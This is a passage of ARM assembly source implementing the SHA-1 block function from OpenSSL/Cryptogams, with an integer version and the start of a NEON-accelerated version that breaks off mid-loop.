text
stringlengths 2
100k
| meta
dict |
---|---|
@ Copyright 2007-2019 The OpenSSL Project Authors. All Rights Reserved.
@
@ ====================================================================
@ Written by Andy Polyakov <[email protected]> for the OpenSSL
@ project. The module is, however, dual licensed under OpenSSL and
@ CRYPTOGAMS licenses depending on where you obtain it. For further
@ details see http://www.openssl.org/~appro/cryptogams/.
@ ====================================================================
@ JW, MAY 2019: Begin defines taken from arm_arch.h
@ The defines were included through the header.
# if !defined(__ARM_ARCH__)
# if defined(__CC_ARM)
# define __ARM_ARCH__ __TARGET_ARCH_ARM
# if defined(__BIG_ENDIAN)
# define __ARMEB__
# else
# define __ARMEL__
# endif
# elif defined(__GNUC__)
# if defined(__aarch64__)
# define __ARM_ARCH__ 8
# if __BYTE_ORDER__==__ORDER_BIG_ENDIAN__
# define __ARMEB__
# else
# define __ARMEL__
# endif
# elif defined(__ARM_ARCH)
# define __ARM_ARCH__ __ARM_ARCH
# elif defined(__ARM_ARCH_8A__)
# define __ARM_ARCH__ 8
# elif defined(__ARM_ARCH_7__) || defined(__ARM_ARCH_7A__) || \
defined(__ARM_ARCH_7R__)|| defined(__ARM_ARCH_7M__) || \
defined(__ARM_ARCH_7EM__)
# define __ARM_ARCH__ 7
# elif defined(__ARM_ARCH_6__) || defined(__ARM_ARCH_6J__) || \
defined(__ARM_ARCH_6K__)|| defined(__ARM_ARCH_6M__) || \
defined(__ARM_ARCH_6Z__)|| defined(__ARM_ARCH_6ZK__) || \
defined(__ARM_ARCH_6T2__)
# define __ARM_ARCH__ 6
# elif defined(__ARM_ARCH_5__) || defined(__ARM_ARCH_5T__) || \
defined(__ARM_ARCH_5E__)|| defined(__ARM_ARCH_5TE__) || \
defined(__ARM_ARCH_5TEJ__)
# define __ARM_ARCH__ 5
# elif defined(__ARM_ARCH_4__) || defined(__ARM_ARCH_4T__)
# define __ARM_ARCH__ 4
# else
# error "unsupported ARM architecture"
# endif
# endif
# endif
# if !defined(__ARM_MAX_ARCH__)
# define __ARM_MAX_ARCH__ __ARM_ARCH__
# endif
# if __ARM_MAX_ARCH__<__ARM_ARCH__
# error "__ARM_MAX_ARCH__ can't be less than __ARM_ARCH__"
# elif __ARM_MAX_ARCH__!=__ARM_ARCH__
# if __ARM_ARCH__<7 && __ARM_MAX_ARCH__>=7 && defined(__ARMEB__)
# error "can't build universal big-endian binary"
# endif
# endif
# define ARMV7_NEON (1<<0)
@ JW, MAY 2019: End defines taken from arm_arch.h
@ Back to original Cryptogams code
#if defined(__thumb2__)
.syntax unified
.thumb
#else
.code 32
#endif
.text
.align 5
.globl sha1_block_data_order_ARM
.type sha1_block_data_order_ARM,%function
@ ------------------------------------------------------------------
@ void sha1_block_data_order_ARM(u32 *state, const u8 *data, size_t num)
@ In:   r0 = pointer to the five 32-bit SHA-1 state words
@       r1 = input message, num blocks of 64 bytes
@       r2 = number of 64-byte blocks (converted to an end pointer below)
@ Working variables A..E live in r3..r7 (B..E kept pre-rotated by 30
@ during the rounds), the current round constant in r8, scratch in
@ r9..r12; the 16-word message schedule window is kept on the stack
@ and addressed downwards through r14.
sha1_block_data_order_ARM:
.Lsha1_block_data_order_ARM:
#if __ARM_ARCH__<7 && !defined(__thumb2__)
sub r3,pc,#8 @ sha1_block_data_order_ARM
#else
adr r3,.Lsha1_block_data_order_ARM
#endif
stmdb sp!,{r4,r5,r6,r7,r8,r9,r10,r11,r12,lr}
add r2,r1,r2,lsl#6 @ r2 to point at the end of r1
ldmia r0,{r3,r4,r5,r6,r7}
@ Main per-block loop; one iteration processes 64 bytes of input.
.Lloop:
ldr r8,.LK_00_19
mov r14,sp
sub sp,sp,#15*4
mov r5,r5,ror#30
mov r6,r6,ror#30
mov r7,r7,ror#30 @ [6]
@ Rounds 0..14, five rounds per pass; each round loads X[i] from the
@ input (byte-by-byte on pre-v7 cores, word load + rev otherwise)
@ and pushes it onto the schedule at [r14,#-4]!.
.L_00_15:
#if __ARM_ARCH__<7
ldrb r10,[r1,#2]
ldrb r9,[r1,#3]
ldrb r11,[r1,#1]
add r7,r8,r7,ror#2 @ E+=K_00_19
ldrb r12,[r1],#4
orr r9,r9,r10,lsl#8
eor r10,r5,r6 @ F_xx_xx
orr r9,r9,r11,lsl#16
add r7,r7,r3,ror#27 @ E+=ROR(A,27)
orr r9,r9,r12,lsl#24
#else
ldr r9,[r1],#4 @ handles unaligned
add r7,r8,r7,ror#2 @ E+=K_00_19
eor r10,r5,r6 @ F_xx_xx
add r7,r7,r3,ror#27 @ E+=ROR(A,27)
#ifdef __ARMEL__
rev r9,r9 @ byte swap
#endif
#endif
and r10,r4,r10,ror#2
add r7,r7,r9 @ E+=X[i]
eor r10,r10,r6,ror#2 @ F_00_19(B,C,D)
str r9,[r14,#-4]!
add r7,r7,r10 @ E+=F_00_19(B,C,D)
#if __ARM_ARCH__<7
ldrb r10,[r1,#2]
ldrb r9,[r1,#3]
ldrb r11,[r1,#1]
add r6,r8,r6,ror#2 @ E+=K_00_19
ldrb r12,[r1],#4
orr r9,r9,r10,lsl#8
eor r10,r4,r5 @ F_xx_xx
orr r9,r9,r11,lsl#16
add r6,r6,r7,ror#27 @ E+=ROR(A,27)
orr r9,r9,r12,lsl#24
#else
ldr r9,[r1],#4 @ handles unaligned
add r6,r8,r6,ror#2 @ E+=K_00_19
eor r10,r4,r5 @ F_xx_xx
add r6,r6,r7,ror#27 @ E+=ROR(A,27)
#ifdef __ARMEL__
rev r9,r9 @ byte swap
#endif
#endif
and r10,r3,r10,ror#2
add r6,r6,r9 @ E+=X[i]
eor r10,r10,r5,ror#2 @ F_00_19(B,C,D)
str r9,[r14,#-4]!
add r6,r6,r10 @ E+=F_00_19(B,C,D)
#if __ARM_ARCH__<7
ldrb r10,[r1,#2]
ldrb r9,[r1,#3]
ldrb r11,[r1,#1]
add r5,r8,r5,ror#2 @ E+=K_00_19
ldrb r12,[r1],#4
orr r9,r9,r10,lsl#8
eor r10,r3,r4 @ F_xx_xx
orr r9,r9,r11,lsl#16
add r5,r5,r6,ror#27 @ E+=ROR(A,27)
orr r9,r9,r12,lsl#24
#else
ldr r9,[r1],#4 @ handles unaligned
add r5,r8,r5,ror#2 @ E+=K_00_19
eor r10,r3,r4 @ F_xx_xx
add r5,r5,r6,ror#27 @ E+=ROR(A,27)
#ifdef __ARMEL__
rev r9,r9 @ byte swap
#endif
#endif
and r10,r7,r10,ror#2
add r5,r5,r9 @ E+=X[i]
eor r10,r10,r4,ror#2 @ F_00_19(B,C,D)
str r9,[r14,#-4]!
add r5,r5,r10 @ E+=F_00_19(B,C,D)
#if __ARM_ARCH__<7
ldrb r10,[r1,#2]
ldrb r9,[r1,#3]
ldrb r11,[r1,#1]
add r4,r8,r4,ror#2 @ E+=K_00_19
ldrb r12,[r1],#4
orr r9,r9,r10,lsl#8
eor r10,r7,r3 @ F_xx_xx
orr r9,r9,r11,lsl#16
add r4,r4,r5,ror#27 @ E+=ROR(A,27)
orr r9,r9,r12,lsl#24
#else
ldr r9,[r1],#4 @ handles unaligned
add r4,r8,r4,ror#2 @ E+=K_00_19
eor r10,r7,r3 @ F_xx_xx
add r4,r4,r5,ror#27 @ E+=ROR(A,27)
#ifdef __ARMEL__
rev r9,r9 @ byte swap
#endif
#endif
and r10,r6,r10,ror#2
add r4,r4,r9 @ E+=X[i]
eor r10,r10,r3,ror#2 @ F_00_19(B,C,D)
str r9,[r14,#-4]!
add r4,r4,r10 @ E+=F_00_19(B,C,D)
#if __ARM_ARCH__<7
ldrb r10,[r1,#2]
ldrb r9,[r1,#3]
ldrb r11,[r1,#1]
add r3,r8,r3,ror#2 @ E+=K_00_19
ldrb r12,[r1],#4
orr r9,r9,r10,lsl#8
eor r10,r6,r7 @ F_xx_xx
orr r9,r9,r11,lsl#16
add r3,r3,r4,ror#27 @ E+=ROR(A,27)
orr r9,r9,r12,lsl#24
#else
ldr r9,[r1],#4 @ handles unaligned
add r3,r8,r3,ror#2 @ E+=K_00_19
eor r10,r6,r7 @ F_xx_xx
add r3,r3,r4,ror#27 @ E+=ROR(A,27)
#ifdef __ARMEL__
rev r9,r9 @ byte swap
#endif
#endif
and r10,r5,r10,ror#2
add r3,r3,r9 @ E+=X[i]
eor r10,r10,r7,ror#2 @ F_00_19(B,C,D)
str r9,[r14,#-4]!
add r3,r3,r10 @ E+=F_00_19(B,C,D)
@ Thumb-2 cannot use sp directly in teq, hence the r12 copy.
#if defined(__thumb2__)
mov r12,sp
teq r14,r12
#else
teq r14,sp
#endif
bne .L_00_15 @ [((11+4)*5+2)*3]
sub sp,sp,#25*4
@ Round 15: last round fed directly from input bytes.
#if __ARM_ARCH__<7
ldrb r10,[r1,#2]
ldrb r9,[r1,#3]
ldrb r11,[r1,#1]
add r7,r8,r7,ror#2 @ E+=K_00_19
ldrb r12,[r1],#4
orr r9,r9,r10,lsl#8
eor r10,r5,r6 @ F_xx_xx
orr r9,r9,r11,lsl#16
add r7,r7,r3,ror#27 @ E+=ROR(A,27)
orr r9,r9,r12,lsl#24
#else
ldr r9,[r1],#4 @ handles unaligned
add r7,r8,r7,ror#2 @ E+=K_00_19
eor r10,r5,r6 @ F_xx_xx
add r7,r7,r3,ror#27 @ E+=ROR(A,27)
#ifdef __ARMEL__
rev r9,r9 @ byte swap
#endif
#endif
and r10,r4,r10,ror#2
add r7,r7,r9 @ E+=X[i]
eor r10,r10,r6,ror#2 @ F_00_19(B,C,D)
str r9,[r14,#-4]!
add r7,r7,r10 @ E+=F_00_19(B,C,D)
@ Rounds 16..19: X[i] now produced by the schedule recurrence
@ (XOR of four earlier words, rotated left by 1).
ldr r9,[r14,#15*4]
ldr r10,[r14,#13*4]
ldr r11,[r14,#7*4]
add r6,r8,r6,ror#2 @ E+=K_xx_xx
ldr r12,[r14,#2*4]
eor r9,r9,r10
eor r11,r11,r12 @ 1 cycle stall
eor r10,r4,r5 @ F_xx_xx
mov r9,r9,ror#31
add r6,r6,r7,ror#27 @ E+=ROR(A,27)
eor r9,r9,r11,ror#31
str r9,[r14,#-4]!
and r10,r3,r10,ror#2 @ F_xx_xx
@ F_xx_xx
add r6,r6,r9 @ E+=X[i]
eor r10,r10,r5,ror#2 @ F_00_19(B,C,D)
add r6,r6,r10 @ E+=F_00_19(B,C,D)
ldr r9,[r14,#15*4]
ldr r10,[r14,#13*4]
ldr r11,[r14,#7*4]
add r5,r8,r5,ror#2 @ E+=K_xx_xx
ldr r12,[r14,#2*4]
eor r9,r9,r10
eor r11,r11,r12 @ 1 cycle stall
eor r10,r3,r4 @ F_xx_xx
mov r9,r9,ror#31
add r5,r5,r6,ror#27 @ E+=ROR(A,27)
eor r9,r9,r11,ror#31
str r9,[r14,#-4]!
and r10,r7,r10,ror#2 @ F_xx_xx
@ F_xx_xx
add r5,r5,r9 @ E+=X[i]
eor r10,r10,r4,ror#2 @ F_00_19(B,C,D)
add r5,r5,r10 @ E+=F_00_19(B,C,D)
ldr r9,[r14,#15*4]
ldr r10,[r14,#13*4]
ldr r11,[r14,#7*4]
add r4,r8,r4,ror#2 @ E+=K_xx_xx
ldr r12,[r14,#2*4]
eor r9,r9,r10
eor r11,r11,r12 @ 1 cycle stall
eor r10,r7,r3 @ F_xx_xx
mov r9,r9,ror#31
add r4,r4,r5,ror#27 @ E+=ROR(A,27)
eor r9,r9,r11,ror#31
str r9,[r14,#-4]!
and r10,r6,r10,ror#2 @ F_xx_xx
@ F_xx_xx
add r4,r4,r9 @ E+=X[i]
eor r10,r10,r3,ror#2 @ F_00_19(B,C,D)
add r4,r4,r10 @ E+=F_00_19(B,C,D)
ldr r9,[r14,#15*4]
ldr r10,[r14,#13*4]
ldr r11,[r14,#7*4]
add r3,r8,r3,ror#2 @ E+=K_xx_xx
ldr r12,[r14,#2*4]
eor r9,r9,r10
eor r11,r11,r12 @ 1 cycle stall
eor r10,r6,r7 @ F_xx_xx
mov r9,r9,ror#31
add r3,r3,r4,ror#27 @ E+=ROR(A,27)
eor r9,r9,r11,ror#31
str r9,[r14,#-4]!
and r10,r5,r10,ror#2 @ F_xx_xx
@ F_xx_xx
add r3,r3,r9 @ E+=X[i]
eor r10,r10,r7,ror#2 @ F_00_19(B,C,D)
add r3,r3,r10 @ E+=F_00_19(B,C,D)
ldr r8,.LK_20_39 @ [+15+16*4]
cmn sp,#0 @ [+3], clear carry to denote 20_39
@ Shared round body for 20..39 and 60..79 (same F = B^C^D, different
@ K in r8); the carry flag distinguishes the two ranges — cleared by
@ the cmn above for 20..39, set before re-entry for 60..79.
.L_20_39_or_60_79:
ldr r9,[r14,#15*4]
ldr r10,[r14,#13*4]
ldr r11,[r14,#7*4]
add r7,r8,r7,ror#2 @ E+=K_xx_xx
ldr r12,[r14,#2*4]
eor r9,r9,r10
eor r11,r11,r12 @ 1 cycle stall
eor r10,r5,r6 @ F_xx_xx
mov r9,r9,ror#31
add r7,r7,r3,ror#27 @ E+=ROR(A,27)
eor r9,r9,r11,ror#31
str r9,[r14,#-4]!
eor r10,r4,r10,ror#2 @ F_xx_xx
@ F_xx_xx
add r7,r7,r9 @ E+=X[i]
add r7,r7,r10 @ E+=F_20_39(B,C,D)
ldr r9,[r14,#15*4]
ldr r10,[r14,#13*4]
ldr r11,[r14,#7*4]
add r6,r8,r6,ror#2 @ E+=K_xx_xx
ldr r12,[r14,#2*4]
eor r9,r9,r10
eor r11,r11,r12 @ 1 cycle stall
eor r10,r4,r5 @ F_xx_xx
mov r9,r9,ror#31
add r6,r6,r7,ror#27 @ E+=ROR(A,27)
eor r9,r9,r11,ror#31
str r9,[r14,#-4]!
eor r10,r3,r10,ror#2 @ F_xx_xx
@ F_xx_xx
add r6,r6,r9 @ E+=X[i]
add r6,r6,r10 @ E+=F_20_39(B,C,D)
ldr r9,[r14,#15*4]
ldr r10,[r14,#13*4]
ldr r11,[r14,#7*4]
add r5,r8,r5,ror#2 @ E+=K_xx_xx
ldr r12,[r14,#2*4]
eor r9,r9,r10
eor r11,r11,r12 @ 1 cycle stall
eor r10,r3,r4 @ F_xx_xx
mov r9,r9,ror#31
add r5,r5,r6,ror#27 @ E+=ROR(A,27)
eor r9,r9,r11,ror#31
str r9,[r14,#-4]!
eor r10,r7,r10,ror#2 @ F_xx_xx
@ F_xx_xx
add r5,r5,r9 @ E+=X[i]
add r5,r5,r10 @ E+=F_20_39(B,C,D)
ldr r9,[r14,#15*4]
ldr r10,[r14,#13*4]
ldr r11,[r14,#7*4]
add r4,r8,r4,ror#2 @ E+=K_xx_xx
ldr r12,[r14,#2*4]
eor r9,r9,r10
eor r11,r11,r12 @ 1 cycle stall
eor r10,r7,r3 @ F_xx_xx
mov r9,r9,ror#31
add r4,r4,r5,ror#27 @ E+=ROR(A,27)
eor r9,r9,r11,ror#31
str r9,[r14,#-4]!
eor r10,r6,r10,ror#2 @ F_xx_xx
@ F_xx_xx
add r4,r4,r9 @ E+=X[i]
add r4,r4,r10 @ E+=F_20_39(B,C,D)
ldr r9,[r14,#15*4]
ldr r10,[r14,#13*4]
ldr r11,[r14,#7*4]
add r3,r8,r3,ror#2 @ E+=K_xx_xx
ldr r12,[r14,#2*4]
eor r9,r9,r10
eor r11,r11,r12 @ 1 cycle stall
eor r10,r6,r7 @ F_xx_xx
mov r9,r9,ror#31
add r3,r3,r4,ror#27 @ E+=ROR(A,27)
eor r9,r9,r11,ror#31
str r9,[r14,#-4]!
eor r10,r5,r10,ror#2 @ F_xx_xx
@ F_xx_xx
add r3,r3,r9 @ E+=X[i]
add r3,r3,r10 @ E+=F_20_39(B,C,D)
#if defined(__thumb2__)
mov r12,sp
teq r14,r12
#else
teq r14,sp @ preserve carry
#endif
bne .L_20_39_or_60_79 @ [+((12+3)*5+2)*4]
bcs .L_done @ [+((12+3)*5+2)*4], spare 300 bytes
ldr r8,.LK_40_59
sub sp,sp,#20*4 @ [+2]
@ Rounds 40..59, F_40_59 computed as (B&(C^D)) + (C&D).
.L_40_59:
ldr r9,[r14,#15*4]
ldr r10,[r14,#13*4]
ldr r11,[r14,#7*4]
add r7,r8,r7,ror#2 @ E+=K_xx_xx
ldr r12,[r14,#2*4]
eor r9,r9,r10
eor r11,r11,r12 @ 1 cycle stall
eor r10,r5,r6 @ F_xx_xx
mov r9,r9,ror#31
add r7,r7,r3,ror#27 @ E+=ROR(A,27)
eor r9,r9,r11,ror#31
str r9,[r14,#-4]!
and r10,r4,r10,ror#2 @ F_xx_xx
and r11,r5,r6 @ F_xx_xx
add r7,r7,r9 @ E+=X[i]
add r7,r7,r10 @ E+=F_40_59(B,C,D)
add r7,r7,r11,ror#2
ldr r9,[r14,#15*4]
ldr r10,[r14,#13*4]
ldr r11,[r14,#7*4]
add r6,r8,r6,ror#2 @ E+=K_xx_xx
ldr r12,[r14,#2*4]
eor r9,r9,r10
eor r11,r11,r12 @ 1 cycle stall
eor r10,r4,r5 @ F_xx_xx
mov r9,r9,ror#31
add r6,r6,r7,ror#27 @ E+=ROR(A,27)
eor r9,r9,r11,ror#31
str r9,[r14,#-4]!
and r10,r3,r10,ror#2 @ F_xx_xx
and r11,r4,r5 @ F_xx_xx
add r6,r6,r9 @ E+=X[i]
add r6,r6,r10 @ E+=F_40_59(B,C,D)
add r6,r6,r11,ror#2
ldr r9,[r14,#15*4]
ldr r10,[r14,#13*4]
ldr r11,[r14,#7*4]
add r5,r8,r5,ror#2 @ E+=K_xx_xx
ldr r12,[r14,#2*4]
eor r9,r9,r10
eor r11,r11,r12 @ 1 cycle stall
eor r10,r3,r4 @ F_xx_xx
mov r9,r9,ror#31
add r5,r5,r6,ror#27 @ E+=ROR(A,27)
eor r9,r9,r11,ror#31
str r9,[r14,#-4]!
and r10,r7,r10,ror#2 @ F_xx_xx
and r11,r3,r4 @ F_xx_xx
add r5,r5,r9 @ E+=X[i]
add r5,r5,r10 @ E+=F_40_59(B,C,D)
add r5,r5,r11,ror#2
ldr r9,[r14,#15*4]
ldr r10,[r14,#13*4]
ldr r11,[r14,#7*4]
add r4,r8,r4,ror#2 @ E+=K_xx_xx
ldr r12,[r14,#2*4]
eor r9,r9,r10
eor r11,r11,r12 @ 1 cycle stall
eor r10,r7,r3 @ F_xx_xx
mov r9,r9,ror#31
add r4,r4,r5,ror#27 @ E+=ROR(A,27)
eor r9,r9,r11,ror#31
str r9,[r14,#-4]!
and r10,r6,r10,ror#2 @ F_xx_xx
and r11,r7,r3 @ F_xx_xx
add r4,r4,r9 @ E+=X[i]
add r4,r4,r10 @ E+=F_40_59(B,C,D)
add r4,r4,r11,ror#2
ldr r9,[r14,#15*4]
ldr r10,[r14,#13*4]
ldr r11,[r14,#7*4]
add r3,r8,r3,ror#2 @ E+=K_xx_xx
ldr r12,[r14,#2*4]
eor r9,r9,r10
eor r11,r11,r12 @ 1 cycle stall
eor r10,r6,r7 @ F_xx_xx
mov r9,r9,ror#31
add r3,r3,r4,ror#27 @ E+=ROR(A,27)
eor r9,r9,r11,ror#31
str r9,[r14,#-4]!
and r10,r5,r10,ror#2 @ F_xx_xx
and r11,r6,r7 @ F_xx_xx
add r3,r3,r9 @ E+=X[i]
add r3,r3,r10 @ E+=F_40_59(B,C,D)
add r3,r3,r11,ror#2
#if defined(__thumb2__)
mov r12,sp
teq r14,r12
#else
teq r14,sp
#endif
bne .L_40_59 @ [+((12+5)*5+2)*4]
ldr r8,.LK_60_79
sub sp,sp,#20*4
cmp sp,#0 @ set carry to denote 60_79
b .L_20_39_or_60_79 @ [+4], spare 300 bytes
@ All 80 rounds done: fold the working variables back into the
@ context (B..E still pre-rotated by 30, hence the ror#2) and loop
@ until r1 reaches the end pointer in r2.
.L_done:
add sp,sp,#80*4 @ "deallocate" stack frame
ldmia r0,{r8,r9,r10,r11,r12}
add r3,r8,r3
add r4,r9,r4
add r5,r10,r5,ror#2
add r6,r11,r6,ror#2
add r7,r12,r7,ror#2
stmia r0,{r3,r4,r5,r6,r7}
teq r1,r2
bne .Lloop @ [+18], total 1307
#if __ARM_ARCH__>=5
ldmia sp!,{r4,r5,r6,r7,r8,r9,r10,r11,r12,pc}
#else
ldmia sp!,{r4,r5,r6,r7,r8,r9,r10,r11,r12,lr}
tst lr,#1
moveq pc,lr @ be binary compatible with V4, yet
.word 0xe12fff1e @ interoperable with Thumb ISA:-)
#endif
.size sha1_block_data_order_ARM,.-sha1_block_data_order_ARM
.align 5
.LK_00_19:.word 0x5a827999
.LK_20_39:.word 0x6ed9eba1
.LK_40_59:.word 0x8f1bbcdc
.LK_60_79:.word 0xca62c1d6
.align 5
#if __ARM_MAX_ARCH__>=7
.arch armv7-a
.fpu neon
.globl sha1_block_data_order_neon
.type sha1_block_data_order_neon,%function
.align 4
@ ------------------------------------------------------------------
@ void sha1_block_data_order_neon(u32 *state, const u8 *data, size_t num)
@ Same arguments as the integer version above.  The message schedule
@ is expanded four words at a time in NEON registers (q0-q3 hold the
@ current 16 input words, q8-q13 the expanded words) while the scalar
@ ALU performs the round updates on r3..r7.  q14 holds the broadcast
@ round constant (reloaded from the .LK_* pool via r8), q15 is kept
@ zero.  A 64-byte schedule buffer below sp is 16-byte aligned so
@ that :128-aligned vst1/ldr traffic is legal; r14 preserves the
@ original sp for the epilogue.
sha1_block_data_order_neon:
stmdb sp!,{r4,r5,r6,r7,r8,r9,r10,r11,r12,lr}
add r2,r1,r2,lsl#6 @ r2 to point at the end of r1
@ dmb @ errata #451034 on early Cortex A8
@ vstmdb sp!,{d8-d15} @ ABI specification says so
mov r14,sp
sub r12,sp,#64
adr r8,.LK_00_19
bic r12,r12,#15 @ align for 128-bit stores
ldmia r0,{r3,r4,r5,r6,r7} @ load context
mov sp,r12 @ alloca
vld1.8 {q0,q1},[r1]! @ handles unaligned
veor q15,q15,q15
vld1.8 {q2,q3},[r1]!
vld1.32 {d28[],d29[]},[r8,:32]! @ load K_00_19
vrev32.8 q0,q0 @ yes, even on
vrev32.8 q1,q1 @ big-endian...
vrev32.8 q2,q2
vadd.i32 q8,q0,q14
vrev32.8 q3,q3
vadd.i32 q9,q1,q14
vst1.32 {q8},[r12,:128]!
vadd.i32 q10,q2,q14
vst1.32 {q9},[r12,:128]!
vst1.32 {q10},[r12,:128]!
ldr r9,[sp] @ big RAW stall
@ One 64-byte block per iteration; NEON message expansion for the
@ next rounds is interleaved with the scalar round computations.
.Loop_neon:
vext.8 q8,q0,q1,#8
bic r10,r6,r4
add r7,r7,r9
and r11,r5,r4
vadd.i32 q13,q3,q14
ldr r9,[sp,#4]
add r7,r7,r3,ror#27
vext.8 q12,q3,q15,#4
eor r11,r11,r10
mov r4,r4,ror#2
add r7,r7,r11
veor q8,q8,q0
bic r10,r5,r3
add r6,r6,r9
veor q12,q12,q2
and r11,r4,r3
ldr r9,[sp,#8]
veor q12,q12,q8
add r6,r6,r7,ror#27
eor r11,r11,r10
vst1.32 {q13},[r12,:128]!
sub r12,r12,#64
mov r3,r3,ror#2
add r6,r6,r11
vext.8 q13,q15,q12,#4
bic r10,r4,r7
add r5,r5,r9
vadd.i32 q8,q12,q12
and r11,r3,r7
ldr r9,[sp,#12]
vsri.32 q8,q12,#31
add r5,r5,r6,ror#27
eor r11,r11,r10
mov r7,r7,ror#2
vshr.u32 q12,q13,#30
add r5,r5,r11
bic r10,r3,r6
vshl.u32 q13,q13,#2
add r4,r4,r9
and r11,r7,r6
veor q8,q8,q12
ldr r9,[sp,#16]
add r4,r4,r5,ror#27
veor q8,q8,q13
eor r11,r11,r10
mov r6,r6,ror#2
add r4,r4,r11
vext.8 q9,q1,q2,#8
bic r10,r7,r5
add r3,r3,r9
and r11,r6,r5
vadd.i32 q13,q8,q14
ldr r9,[sp,#20]
vld1.32 {d28[],d29[]},[r8,:32]!
add r3,r3,r4,ror#27
vext.8 q12,q8,q15,#4
eor r11,r11,r10
mov r5,r5,ror#2
add r3,r3,r11
veor q9,q9,q1
bic r10,r6,r4
add r7,r7,r9
veor q12,q12,q3
and r11,r5,r4
ldr r9,[sp,#24]
veor q12,q12,q9
add r7,r7,r3,ror#27
eor r11,r11,r10
vst1.32 {q13},[r12,:128]!
mov r4,r4,ror#2
add r7,r7,r11
vext.8 q13,q15,q12,#4
bic r10,r5,r3
add r6,r6,r9
vadd.i32 q9,q12,q12
and r11,r4,r3
ldr r9,[sp,#28]
vsri.32 q9,q12,#31
add r6,r6,r7,ror#27
eor r11,r11,r10
mov r3,r3,ror#2
vshr.u32 q12,q13,#30
add r6,r6,r11
bic r10,r4,r7
vshl.u32 q13,q13,#2
add r5,r5,r9
and r11,r3,r7
veor q9,q9,q12
ldr r9,[sp,#32]
add r5,r5,r6,ror#27
veor q9,q9,q13
eor r11,r11,r10
mov r7,r7,ror#2
add r5,r5,r11
vext.8 q10,q2,q3,#8
bic r10,r3,r6
add r4,r4,r9
and r11,r7,r6
vadd.i32 q13,q9,q14
ldr r9,[sp,#36]
add r4,r4,r5,ror#27
vext.8 q12,q9,q15,#4
eor r11,r11,r10
mov r6,r6,ror#2
add r4,r4,r11
veor q10,q10,q2
bic r10,r7,r5
add r3,r3,r9
veor q12,q12,q8
and r11,r6,r5
ldr r9,[sp,#40]
veor q12,q12,q10
add r3,r3,r4,ror#27
eor r11,r11,r10
vst1.32 {q13},[r12,:128]!
mov r5,r5,ror#2
add r3,r3,r11
vext.8 q13,q15,q12,#4
bic r10,r6,r4
add r7,r7,r9
vadd.i32 q10,q12,q12
and r11,r5,r4
ldr r9,[sp,#44]
vsri.32 q10,q12,#31
add r7,r7,r3,ror#27
eor r11,r11,r10
mov r4,r4,ror#2
vshr.u32 q12,q13,#30
add r7,r7,r11
bic r10,r5,r3
vshl.u32 q13,q13,#2
add r6,r6,r9
and r11,r4,r3
veor q10,q10,q12
ldr r9,[sp,#48]
add r6,r6,r7,ror#27
veor q10,q10,q13
eor r11,r11,r10
mov r3,r3,ror#2
add r6,r6,r11
vext.8 q11,q3,q8,#8
bic r10,r4,r7
add r5,r5,r9
and r11,r3,r7
vadd.i32 q13,q10,q14
ldr r9,[sp,#52]
add r5,r5,r6,ror#27
vext.8 q12,q10,q15,#4
eor r11,r11,r10
mov r7,r7,ror#2
add r5,r5,r11
veor q11,q11,q3
bic r10,r3,r6
add r4,r4,r9
veor q12,q12,q9
and r11,r7,r6
ldr r9,[sp,#56]
veor q12,q12,q11
add r4,r4,r5,ror#27
eor r11,r11,r10
vst1.32 {q13},[r12,:128]!
mov r6,r6,ror#2
add r4,r4,r11
vext.8 q13,q15,q12,#4
bic r10,r7,r5
add r3,r3,r9
vadd.i32 q11,q12,q12
and r11,r6,r5
ldr r9,[sp,#60]
vsri.32 q11,q12,#31
add r3,r3,r4,ror#27
eor r11,r11,r10
mov r5,r5,ror#2
vshr.u32 q12,q13,#30
add r3,r3,r11
bic r10,r6,r4
vshl.u32 q13,q13,#2
add r7,r7,r9
and r11,r5,r4
veor q11,q11,q12
ldr r9,[sp,#0]
add r7,r7,r3,ror#27
veor q11,q11,q13
eor r11,r11,r10
mov r4,r4,ror#2
add r7,r7,r11
vext.8 q12,q10,q11,#8
bic r10,r5,r3
add r6,r6,r9
and r11,r4,r3
veor q0,q0,q8
ldr r9,[sp,#4]
add r6,r6,r7,ror#27
veor q0,q0,q1
eor r11,r11,r10
mov r3,r3,ror#2
vadd.i32 q13,q11,q14
add r6,r6,r11
bic r10,r4,r7
veor q12,q12,q0
add r5,r5,r9
and r11,r3,r7
vshr.u32 q0,q12,#30
ldr r9,[sp,#8]
add r5,r5,r6,ror#27
vst1.32 {q13},[r12,:128]!
sub r12,r12,#64
eor r11,r11,r10
mov r7,r7,ror#2
vsli.32 q0,q12,#2
add r5,r5,r11
bic r10,r3,r6
add r4,r4,r9
and r11,r7,r6
ldr r9,[sp,#12]
add r4,r4,r5,ror#27
eor r11,r11,r10
mov r6,r6,ror#2
add r4,r4,r11
bic r10,r7,r5
add r3,r3,r9
and r11,r6,r5
ldr r9,[sp,#16]
add r3,r3,r4,ror#27
eor r11,r11,r10
mov r5,r5,ror#2
add r3,r3,r11
vext.8 q12,q11,q0,#8
eor r10,r4,r6
add r7,r7,r9
ldr r9,[sp,#20]
veor q1,q1,q9
eor r11,r10,r5
add r7,r7,r3,ror#27
veor q1,q1,q2
mov r4,r4,ror#2
add r7,r7,r11
vadd.i32 q13,q0,q14
eor r10,r3,r5
add r6,r6,r9
veor q12,q12,q1
ldr r9,[sp,#24]
eor r11,r10,r4
vshr.u32 q1,q12,#30
add r6,r6,r7,ror#27
mov r3,r3,ror#2
vst1.32 {q13},[r12,:128]!
add r6,r6,r11
eor r10,r7,r4
vsli.32 q1,q12,#2
add r5,r5,r9
ldr r9,[sp,#28]
eor r11,r10,r3
add r5,r5,r6,ror#27
mov r7,r7,ror#2
add r5,r5,r11
eor r10,r6,r3
add r4,r4,r9
ldr r9,[sp,#32]
eor r11,r10,r7
add r4,r4,r5,ror#27
mov r6,r6,ror#2
add r4,r4,r11
vext.8 q12,q0,q1,#8
eor r10,r5,r7
add r3,r3,r9
ldr r9,[sp,#36]
veor q2,q2,q10
eor r11,r10,r6
add r3,r3,r4,ror#27
veor q2,q2,q3
mov r5,r5,ror#2
add r3,r3,r11
vadd.i32 q13,q1,q14
eor r10,r4,r6
vld1.32 {d28[],d29[]},[r8,:32]!
add r7,r7,r9
veor q12,q12,q2
ldr r9,[sp,#40]
eor r11,r10,r5
vshr.u32 q2,q12,#30
add r7,r7,r3,ror#27
mov r4,r4,ror#2
vst1.32 {q13},[r12,:128]!
add r7,r7,r11
eor r10,r3,r5
vsli.32 q2,q12,#2
add r6,r6,r9
ldr r9,[sp,#44]
eor r11,r10,r4
add r6,r6,r7,ror#27
mov r3,r3,ror#2
add r6,r6,r11
eor r10,r7,r4
add r5,r5,r9
ldr r9,[sp,#48]
eor r11,r10,r3
